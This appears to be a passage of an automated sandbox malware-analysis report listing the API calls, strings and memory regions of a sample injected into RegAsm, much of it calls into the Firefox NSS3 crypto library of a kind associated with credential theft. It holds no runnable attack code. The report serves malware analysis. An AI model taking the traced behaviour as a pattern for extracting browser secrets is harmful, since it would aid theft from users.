                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C21EBC2
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C21EBEC
                                                                                                        • free.MOZGLUE(00000000), ref: 6C21EC58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                        • String ID: S!l
                                                                                                        • API String ID: 759478663-3511714027
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcessstrtok_s
                                                                                                        • String ID: DwA$block
                                                                                                        • API String ID: 3407564107-4170876926
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C1E4E83
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E4EB8
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4EC7
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4EDD
                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C1E4F0B
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4F1A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4F30
                                                                                                        • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C1E4F4F
                                                                                                        • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C1E4F68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$n,l
                                                                                                        • API String ID: 1003633598-1170522481
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C1E4CF3
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E4D28
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4D37
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4D4D
                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C1E4D7B
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4D8A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4DA0
                                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C1E4DBC
                                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C1E4E20
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$n,l
                                                                                                        • API String ID: 1003633598-1352789624
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_SetPIN), ref: 6C1E2F26
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E2F54
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E2F63
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E2F79
                                                                                                        • PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C1E2F9A
                                                                                                        • PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C1E2FB5
                                                                                                        • PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C1E2FCE
                                                                                                        • PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C1E2FE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$n,l
                                                                                                        • API String ID: 1003633598-2918854871
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,759183C0,00000000,0041C55B,?), ref: 0041B875
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,0043613C), ref: 0041B8A3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0041B8B3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0041B8BF
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0041B8CB
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0041B8D7
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0041B8E3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0041B8EF
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0041B8FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                        • API String ID: 1659193697-51310709
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C24290A
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C24291E
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C242937
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C24294B
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242966
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C2429AC
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C2429D1
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C2429F0
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242A15
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242A37
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A61
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A78
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A8F
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242AA6
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C27945B
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C279479
                                                                                                          • Part of subcall function 6C279440: EnterCriticalSection.KERNEL32 ref: 6C279495
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C2794E4
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C279532
                                                                                                          • Part of subcall function 6C279440: LeaveCriticalSection.KERNEL32 ref: 6C27955D
                                                                                                        • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C242AF9
                                                                                                        • free.MOZGLUE(?), ref: 6C242B16
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C242B6D
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C242B80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 2841089016-0
                                                                                                        APIs
                                                                                                        • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C208E01,00000000,6C209060,6C310B64), ref: 6C208E7B
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208E9E
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(6C310B64,00000001,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EAD
                                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EC3
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208ED8
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EE5
                                                                                                        • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C208E01), ref: 6C208EFB
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C310B64,6C310B64), ref: 6C208F11
                                                                                                        • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C208F3F
                                                                                                          • Part of subcall function 6C20A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C20A421,00000000,00000000,6C209826), ref: 6C20A136
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C20904A
                                                                                                        Strings
                                                                                                        • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C208E76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                        • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                        • API String ID: 977052965-1032500510
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B8E5B
                                                                                                        • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C1B8E81
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1B8EED
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2E18D0,?), ref: 6C1B8F03
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B8F19
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B8F2B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C1B8F53
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C1B8F65
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B8FA1
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1B8FFE
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B9012
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B9024
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B902C
                                                                                                        • PORT_DestroyCheapArena.NSS3(?), ref: 6C1B903E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3512696800-3315324353
                                                                                                        APIs
                                                                                                        • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C27CC7B), ref: 6C27CD7A
                                                                                                          • Part of subcall function 6C27CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C1EC1A8,?), ref: 6C27CE92
                                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CDA5
                                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CDB8
                                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C27CDDB
                                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CD8E
                                                                                                          • Part of subcall function 6C1A05C0: PR_EnterMonitor.NSS3 ref: 6C1A05D1
                                                                                                          • Part of subcall function 6C1A05C0: PR_ExitMonitor.NSS3 ref: 6C1A05EA
                                                                                                        • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C27CDE8
                                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CDFF
                                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CE16
                                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CE29
                                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C27CE48
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                        • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(*,"l), ref: 6C220C81
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                          • Part of subcall function 6C1F8500: SECOID_GetAlgorithmTag_Util.NSS3(6C1F95DC,00000000,00000000,00000000,?,6C1F95DC,00000000,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F8517
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220CC4
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C220CD5
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C220D1D
                                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C220D3B
                                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C220D7D
                                                                                                        • free.MOZGLUE(00000000), ref: 6C220DB5
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220DC1
                                                                                                        • free.MOZGLUE(00000000), ref: 6C220DF7
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220E05
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C220E0F
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F95E0
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F95F5
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C1F9609
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F961D
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetInternalSlot.NSS3 ref: 6C1F970B
                                                                                                          • Part of subcall function 6C1F95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C1F9756
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetIVLength.NSS3(?), ref: 6C1F9767
                                                                                                          • Part of subcall function 6C1F95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C1F977E
                                                                                                          • Part of subcall function 6C1F95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1F978E
                                                                                                        Similarity
                                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                        • String ID: *,"l$*,"l$-$"l
                                                                                                        APIs
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C2E1DE0,?), ref: 6C216CFE
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C216D26
                                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C216D70
                                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C216D82
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C216DA2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C216DD8
                                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C216E60
                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C216F19
                                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C216F2D
                                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C216F7B
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C217011
                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C217033
                                                                                                        • free.MOZGLUE(?), ref: 6C21703F
                                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C217060
                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C217087
                                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C2170AF
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                        • String ID:
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF25
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF39
                                                                                                        • PR_Unlock.NSS3(?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF51
                                                                                                        • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF69
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1DB06B
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1DB083
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1DB0A4
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1DB0C1
                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C1DB0D9
                                                                                                        • PR_Unlock.NSS3 ref: 6C1DB102
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DB151
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DB182
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C1DB177
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1A2
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1AA
                                                                                                        • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1C2
                                                                                                          • Part of subcall function 6C201560: TlsGetValue.KERNEL32(00000000,?,6C1D0844,?), ref: 6C20157A
                                                                                                          • Part of subcall function 6C201560: EnterCriticalSection.KERNEL32(?,?,?,6C1D0844,?), ref: 6C20158F
                                                                                                          • Part of subcall function 6C201560: PR_Unlock.NSS3(?,?,?,?,6C1D0844,?), ref: 6C2015B2
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                        • String ID:
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22ADB1
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C22ADF4
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C22AE08
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C22AE25
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C22AE63
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C22AE4D
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22AE93
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C22AECC
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C22AEDE
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C22AEE6
                                                                                                        • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22AEF5
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C22AF16
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                        • String ID: security
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C279890: TlsGetValue.KERNEL32(?,?,?,6C2797EB), ref: 6C27989E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CAF88
                                                                                                        • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C2CAFCE
                                                                                                        • PR_SetPollableEvent.NSS3(?), ref: 6C2CAFD9
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CAFEF
                                                                                                        • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C2CB00F
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB02F
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB070
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB07B
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB084
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CB09B
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB0C4
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB0F3
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB0FC
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB137
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB140
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 235599594-0
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?), ref: 6C1C8E22
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1C8E36
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8E4F
                                                                                                        • calloc.MOZGLUE(00000001,?,?,?), ref: 6C1C8E78
                                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C1C8E9B
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C1C8EAC
                                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C1C8EDE
                                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C1C8EF0
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F00
                                                                                                        • free.MOZGLUE(?), ref: 6C1C8F0E
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1C8F39
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F4A
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F5B
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C8F72
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C8F82
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1569127702-0
                                                                                                        APIs
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000132), ref: 6C1ECE9E
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C1ECEBB
                                                                                                        • PK11_DoesMechanism.NSS3(?,00001081), ref: 6C1ECED8
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000551), ref: 6C1ECEF5
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000651), ref: 6C1ECF12
